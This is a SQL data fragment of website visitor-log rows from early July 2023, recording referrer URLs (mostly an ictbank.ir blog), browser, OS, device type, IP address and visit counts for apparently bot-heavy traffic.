(35287,'2023-07-03','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','185.216.140.56','000',0,2,0),
(35288,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.67.75','000',0,1,0),
(35289,'2023-07-03','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.40','000',0,13,0),
(35290,'2023-07-03','https://www.bing.com','Firefox','Windows','113.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(35291,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(35292,'2023-07-03','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','192.119.67.73','000',0,2,0),
(35293,'2023-07-03','https://www.bing.com','Firefox','Windows','113.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(35294,'2023-07-03','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','49.236.200.213','000',0,1,0),
(35295,'2023-07-03','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','141.98.10.14','000',0,1,0),
(35296,'2023-07-04','http://ictbank.ir','Firefox','Windows','42.0','desktop','Unknown','','185.220.101.44','000',0,1,0),
(35297,'2023-07-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','74.80.208.40','000',0,19,0),
(35298,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(35299,'2023-07-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.6','000',0,2,0),
(35300,'2023-07-04','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35301,'2023-07-04','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,12,0),
(35302,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','199.249.230.118','000',0,1,0),
(35303,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','102.0','desktop','Unknown','','37.228.129.5','000',0,1,0),
(35304,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(35305,'2023-07-04','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(35306,'2023-07-04','https://ictbank.ir/blog','Chrome','OS X','101.0.0','desktop','Macintosh','','165.154.119.37','000',0,17,0),
(35307,'2023-07-04','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.1.40.148','000',0,9,0),
(35308,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(35309,'2023-07-04','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','134.122.77.127','000',0,1,0),
(35310,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.233.100.23','000',0,1,0),
(35311,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.220.101.24','000',0,1,0),
(35312,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','89.147.109.50','000',0,1,0),
(35313,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','23.137.251.61','000',0,1,0),
(35314,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.220.103.116','000',0,1,0),
(35315,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','77.48.28.204','000',0,1,0),
(35316,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','94.228.169.70','000',0,1,0),
(35317,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.220.103.117','000',0,2,0),
(35318,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.220.101.177','000',0,1,0),
(35319,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','162.247.74.27','000',0,2,0),
(35320,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','185.220.103.6','000',0,3,0),
(35321,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','19.0','desktop','Unknown','','107.189.6.118','000',0,1,0),
(35322,'2023-07-04','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(35323,'2023-07-04','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,4,0),
(35324,'2023-07-04','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(35325,'2023-07-04','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(35326,'2023-07-04','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,2,0),
(35327,'2023-07-04','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.48.154','000',0,1,0),
(35328,'2023-07-04','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.237.131.252','000',0,6,0),
(35329,'2023-07-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','162.241.226.22','000',0,1,0),
(35330,'2023-07-04','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.172','000',0,27,0),
(35331,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35332,'2023-07-04','https://ictbank.ir/hooman/admin/','Chrome','Windows','114.0.0.0','desktop','Unknown','','151.238.16.59','000',0,107,0),
(35333,'2023-07-04','http://design-arena.ir','Internet Explorer','Windows','9.0','desktop','Unknown','','185.220.101.33','000',0,1,0),
(35334,'2023-07-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.153','000',0,1,0),
(35335,'2023-07-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.135','000',0,1,0),
(35336,'2023-07-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.152','000',0,1,0),
(35337,'2023-07-04','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.90.169','000',0,1,0),
(35338,'2023-07-04','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,1,0),
(35339,'2023-07-04','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','185.33.141.53','000',0,1,0),
(35340,'2023-07-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
(35341,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35342,'2023-07-04','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(35343,'2023-07-04','https://ictbank.ir/blog','Firefox','Linux','51.0','desktop','Unknown','','181.214.94.33','000',0,2,0),
(35344,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,2,0),
(35345,'2023-07-04','https://ictbank.ir/blog','Chrome','Android','38.0.0.0','mobile:smart','Nexus 5','','82.202.161.179','000',0,1,0),
(35346,'2023-07-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.5','000',0,2,0),
(35347,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35348,'2023-07-04','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.188','000',0,1,0),
(35349,'2023-07-04','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','114.0.0.0','desktop','Unknown','','5.238.37.121','000',0,40,0),
(35350,'2023-07-04','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/?EsetProtoscanCtx=2c8908e3190','Chrome','Windows','114.0.0.0','desktop','Unknown','','109.173.251.16','000',0,2,0),
(35351,'2023-07-04','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.81','000',0,3,0),
(35352,'2023-07-04','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','51.77.247.119','000',0,15,0),
(35353,'2023-07-04','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','162.144.85.198','000',0,1,0),
(35354,'2023-07-04','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.196.35.145','000',0,1,0),
(35355,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,4,0),
(35356,'2023-07-04','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(35357,'2023-07-04','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','68.183.190.158','000',0,1,0),
(35358,'2023-07-04','https://ictbank.ir/blog','Firefox','Windows','51.0','desktop','Unknown','','79.137.202.106','000',0,1,0),
(35359,'2023-07-04','https://ictbank.ir/blog','Firefox','Ubuntu','113.0','desktop','Unknown','','146.70.173.100','000',0,1,0),
(35360,'2023-07-04','https://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(35361,'2023-07-05','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35362,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,4,0),
(35363,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(35364,'2023-07-05','https://ictbank.ir/blog','Firefox','Windows','81.0','desktop','Unknown','','5.196.176.254','000',0,4,0),
(35365,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(35366,'2023-07-05','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,4,0),
(35367,'2023-07-05','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','195.96.200.252','000',0,2,0),
(35368,'2023-07-05','http://design-arena.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','52.147.207.96','000',0,1,0),
(35369,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.140.4','000',0,1,0),
(35370,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(35371,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,4,0),
(35372,'2023-07-05','https://ictbank.ir/blog','Chrome','Linux','38.0.0.0','desktop','Unknown','','24.199.92.105','000',0,1,0),
(35373,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(35374,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','9.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(35375,'2023-07-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','132.145.78.163','000',0,60,0),
(35376,'2023-07-05','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(35377,'2023-07-05','https://www.google.com/','Chrome','Linux','114.0.0.0','desktop','Unknown','','122.176.23.50','000',0,1,0),
(35378,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.15.14','000',0,4,0),
(35379,'2023-07-05','https://45.92.94.221/blog','Chrome','Linux','86.0.0','desktop','Unknown','','118.123.105.86','000',0,8,0),
(35380,'2023-07-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(35381,'2023-07-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.190','000',0,2,0),
(35382,'2023-07-05','http://ictbank.ir','Chrome','Windows','186.0.0.0','desktop','Unknown','','199.188.204.110','000',0,1,0),
(35383,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.15.38','000',0,2,0),
(35384,'2023-07-05','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(35385,'2023-07-05','https://ictbank.ir/blog','Safari','iOS','12.0.0','mobile:smart','iPhone','','202.188.220.53','000',0,2,0),
(35386,'2023-07-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.12','000',0,1,0),
(35387,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(35388,'2023-07-05','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,2,0),
(35389,'2023-07-05','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','62.122.184.194','000',0,1,0),
(35390,'2023-07-05','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,2,0),
(35391,'2023-07-05','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.112','000',0,13,0),
(35392,'2023-07-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','207.244.242.168','000',0,2,0),
(35393,'2023-07-05','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','139.59.10.149','000',0,1,0),
(35394,'2023-07-05','http://design-arena.ir','Chrome','Windows','86.0.0.0','desktop','Unknown','','202.77.48.139','000',0,1,0),
(35395,'2023-07-05','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','74.220.219.162','000',0,1,0),
(35396,'2023-07-06','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.112','000',0,23,0),
(35397,'2023-07-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,4,0),
(35398,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','196.189.44.4','000',0,127,0),
(35399,'2023-07-06','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35400,'2023-07-06','http://design-arena.ir','Chrome','Windows','186.0.0.0','desktop','Unknown','','162.144.85.198','000',0,1,0),
(35401,'2023-07-06','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','192.36.109.117','000',0,1,0),
(35402,'2023-07-06','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','192.36.109.73','000',0,1,0),
(35403,'2023-07-06','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','192.36.109.114','000',0,1,0),
(35404,'2023-07-06','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','192.36.109.108','000',0,1,0),
(35405,'2023-07-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.79','000',0,2,0),
(35406,'2023-07-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,6,0),
(35407,'2023-07-06','https://ictbank.ir/blog','Firefox','Linux','45.0','desktop','Unknown','','79.137.202.106','000',0,1,0),
(35408,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','178.208.160.64','000',0,10,0),
(35409,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,3,0),
(35410,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.123','000',0,1,0),
(35411,'2023-07-06','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(35412,'2023-07-06','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(35413,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(35414,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','32.0.0.0','desktop','Unknown','','104.249.27.207','000',0,1,0),
(35415,'2023-07-06','https://l.instagram.com/','Instagram','Android','289.0.0.0.0','mobile:smart','Galaxy C7','','104.28.214.162','000',0,1,0),
(35416,'2023-07-06','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','37.187.215.253','000',0,1,0),
(35417,'2023-07-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.31','000',0,2,0),
(35418,'2023-07-06','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.158.37.186','000',0,1,0),
(35419,'2023-07-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35420,'2023-07-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','114.0.0.0','desktop','Unknown','','31.59.116.251','000',0,29,0),
(35421,'2023-07-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','4.151.4.213','000',0,1,0),
(35422,'2023-07-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.50','000',0,4,0),
(35423,'2023-07-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','82.165.88.187','000',0,1,0),
(35424,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.164.30','000',0,10,0),
(35425,'2023-07-06','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.245.144','000',0,9,0),
(35426,'2023-07-06','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.35','000',0,1,0),
(35427,'2023-07-06','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','66.240.192.138','000',0,2,0),
(35428,'2023-07-06','http://ictbank.ir/blog/connection-encryption-in-oracle-database/','Edge','Windows','114.0.0.0','desktop','Unknown','','172.98.66.168','000',0,2,0),
(35429,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.11','000',0,1,0),
(35430,'2023-07-06','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','176.109.227.242','000',0,1,0),
(35431,'2023-07-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','139.162.104.75','000',0,1,0),
(35432,'2023-07-06','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.34','000',0,1,0),
(35433,'2023-07-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.129.12','000',0,2,0),
(35434,'2023-07-06','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','157.230.219.118','000',0,1,0),
(35435,'2023-07-06','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','68.178.224.102','000',0,1,0),
(35436,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','3.83.239.83','000',0,1,0),
(35437,'2023-07-06','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(35438,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.48','000',0,2,0),
(35439,'2023-07-06','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.104','000',0,2,0),
(35440,'2023-07-06','https://ictbank.ir/blog','Firefox','Ubuntu','102.0','desktop','Unknown','','69.58.77.221','000',0,3,0),
(35441,'2023-07-06','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','193.32.162.174','000',0,2,0),
(35442,'2023-07-06','https://45.92.94.221/blog','Chrome','Windows','80.0.0','desktop','Unknown','','165.154.119.44','000',0,19,0),
(35443,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.62','000',0,1,0),
(35444,'2023-07-07','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.53','000',0,1,0),
(35445,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(35446,'2023-07-07','https://design-arena.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','62.122.184.194','000',0,1,0),
(35447,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','89.208.105.162','000',0,2,0),
(35448,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(35449,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','54.39.104.60','000',0,1,0),
(35450,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.53','000',0,4,0),
(35451,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.37','000',0,1,0),
(35452,'2023-07-07','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Mate 30 Pro','','47.88.87.97','000',0,3,0),
(35453,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','5.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(35454,'2023-07-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','139.59.231.111','000',0,2,0),
(35455,'2023-07-07','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(35456,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(35457,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.231','000',0,1,0),
(35458,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.222','000',0,1,0),
(35459,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.121.82','000',0,2,0),
(35460,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(35461,'2023-07-07','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35462,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','193.201.8.40','000',0,10,0),
(35463,'2023-07-07','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','20.197.112.237','000',0,1,0),
(35464,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','81.0.0.0','desktop','Unknown','','80.94.92.42','000',0,2,0),
(35465,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','151.236.216.180','000',0,1,0),
(35466,'2023-07-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.165.136.50','000',0,1,0),
(35467,'2023-07-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','172.104.77.164','000',0,1,0),
(35468,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.225.103','000',0,2,0),
(35469,'2023-07-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','178.128.228.237','000',0,1,0),
(35470,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(35471,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','65.109.210.126','000',0,1,0),
(35472,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(35473,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(35474,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','61.243.79.69','000',0,1,0),
(35475,'2023-07-07','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','194.76.27.97','000',0,1,0),
(35476,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','109.229.213.23','000',0,1,0),
(35477,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','212.142.103.56','000',0,1,0),
(35478,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,6,0),
(35479,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.156.128.7','000',0,2,0),
(35480,'2023-07-07','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','194.169.175.36','000',0,1,0),
(35481,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(35482,'2023-07-07','http://ictbank.ir','Chrome','Windows','74.0.0.0','desktop','Unknown','','139.59.77.216','000',0,1,0),
(35483,'2023-07-07','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','114.108.148.220','000',0,1,0),
(35484,'2023-07-07','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(35485,'2023-07-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.18','000',0,1,0),
(35486,'2023-07-07','https://ictbank.ir/blog','Firefox','Fedora','95.0','desktop','Unknown','','64.90.48.201','000',0,1,0),
(35487,'2023-07-07','https://ictbank.ir/blog','Opera','Windows','52.0.0.0','desktop','Unknown','','144.202.62.236','000',0,1,0),
(35488,'2023-07-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35489,'2023-07-07','https://45.92.94.221:443/blog','Chrome','Windows','86.0.0.0','desktop','Unknown','','106.75.142.97','000',0,4,0),
(35490,'2023-07-07','http://ictbank.ir','Chrome','Windows','86.0.0.0','desktop','Unknown','','200.17.137.52','000',0,1,0),
(35491,'2023-07-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.49','000',0,2,0),
(35492,'2023-07-07','https://ictbank.ir/blog','Chrome','OS X','39.0.0.0','desktop','Macintosh','','45.76.188.87','000',0,1,0),
(35493,'2023-07-08','https://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','123.245.25.43','000',0,1,0),
(35494,'2023-07-08','https://ictbank.ir/blog','Chrome','Linux','26.0.0.0','desktop','Unknown','','144.76.62.188','000',0,1,0),
(35495,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','193.201.8.40','000',0,3,0),
(35496,'2023-07-08','https://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','167.71.164.191','000',0,2,0),
(35497,'2023-07-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','78.47.167.185','000',0,1,0),
(35498,'2023-07-08','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(35499,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,4,0),
(35500,'2023-07-08','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(35501,'2023-07-08','https://ictbank.ir/blog','Chrome','Windows','114.0.0.0','desktop','Unknown','','103.148.25.242','000',0,6,0),
(35502,'2023-07-08','https://ictbank.ir/blog','Chromium','Ubuntu','12.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(35503,'2023-07-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.108','000',0,2,0),
(35504,'2023-07-08','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(35505,'2023-07-08','https://ictbank.ir/blog','Chrome','Linux','114.0.0.0','desktop','Unknown','','31.13.115.116','000',0,1,0),
(35506,'2023-07-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.251.102.74','000',0,2,0),
